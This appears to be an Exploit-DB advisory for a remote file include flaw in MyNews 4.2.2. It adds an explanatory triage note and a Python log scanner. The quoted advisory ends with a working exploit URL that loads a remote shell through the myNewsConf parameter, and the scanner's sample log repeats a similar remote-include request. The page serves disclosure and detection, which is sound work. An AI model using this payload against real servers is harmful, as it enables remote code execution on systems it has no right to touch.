vendor: MyNews
by: GolD_M (Mahmnood_ali)
N/A
CVSS: HIGH
Remote File Include
CWE
Product Name: MyNews
Affected Version From: 4.2.2002
Affected Version To: 4.2.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MyNews 4.2.2 <= Remote File Include Vulnerability

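This vulnerability allows an attacker to include a remote file in the MyNews application, potentially leading to remote code execution. It is located in /include/themes/themefunc.php: line 2 calls require() on a path built from $myNewsConf['path']['sys']['index'] without validating it, and the advisory below shows that value being supplied as a request parameter when the script is requested directly.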

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input before including any files, so that a request parameter can never set the path passed to require(). Additionally, it is advised to keep the application up to date with the latest patches and security measures.
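
For triage on an affected host, the following added example (not part of the original advisory or of MyNews) scans web access log lines for requests that supply the `myNewsConf` array as a request parameter. It goes beyond the single script named above by flagging the parameter on any path, since application configuration should never arrive in a request. The log lines, addresses and host names are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that points an include path at a URL or a stream wrapper.
REMOTE_RE = re.compile(
    r'^\s*(?:(?:[a-z][a-z0-9+.\-]*:)?//|(?:data|php|expect|zip|phar):)', re.I)

# Constructed sample lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2007:10:00:00 +0000] '
    '"GET /mynews/index.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/Jan/2007:10:00:05 +0000] '
    '"GET /mynews/include/themes/themefunc.php'
    '?myNewsConf[path][sys][index]=http://remote.example/x? HTTP/1.0" 200 312',
    '192.0.2.77 - - [30/Jan/2007:10:00:09 +0000] '
    '"GET /mynews/include/themes/themefunc.php'
    '?myNewsConf%5Bpath%5D%5Bsys%5D%5Bindex%5D=%2Ftmp HTTP/1.0" 500 0',
]


def classify(log_line):
    """Return None, 'config-override' or 'remote-include' for one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    verdict = None
    # parse_qsl percent-decodes keys and values, so %5B/%5D forms match too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.split("[", 1)[0].lower() != "mynewsconf":
            continue
        if REMOTE_RE.search(value):
            return "remote-include"      # include path aimed at a remote source
        verdict = "config-override"      # config array set from the request
    return verdict


def scan(lines):
    """Return (verdict, line) for every line that touches myNewsConf."""
    return [(v, line) for line in lines if (v := classify(line))]


if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(f"{verdict:16} {line}")
```
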
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MyNews 4.2.2 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://fresh.t-systems-sfr.com/unix/src/privat2/MyNews-4.2.2.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /include/themes/themefunc.php  <<<<=====>>>>      Line : 2
require($myNewsConf['path']['sys']['index'] .  '/include/libs/modules.lib.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
http://www.hedef.com/[mynews_path]/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2007-01-30]